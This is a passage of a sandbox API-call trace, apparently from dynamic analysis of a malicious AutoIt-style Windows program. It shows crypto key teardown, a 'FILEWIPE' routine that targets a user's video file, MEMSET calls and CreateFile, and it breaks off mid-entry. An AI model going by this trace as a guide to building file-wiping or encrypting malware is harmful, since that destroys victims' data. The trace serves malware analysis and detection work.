[0198.014] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.014] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.014] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.014] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.014] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.014] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.014] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.014] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.014] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.014] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.014] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.014] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.015] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.015] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0198.015] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.022] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.022] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.022] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.025] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.025] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.025] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.025] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.025] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0198.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.025] CryptDestroyKey (hKey=0x90af18) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.029] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.029] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.029] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0198.029] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.029] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.030] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.030] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.030] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0198.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.030] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.030] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.030] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.035] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.035] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.035] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0198.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.035] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.035] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0198.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.036] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.036] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0198.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.038] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0xa475b570, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 0x90af58 [0198.038] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.039] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.039] CharLowerBuffW (in: lpsz="byte[80332]", cchLength=0xb | out: lpsz="byte[80332]") returned 0xb [0198.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.040] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.040] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.040] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.040] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.040] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.041] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.041] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.041] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.041] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 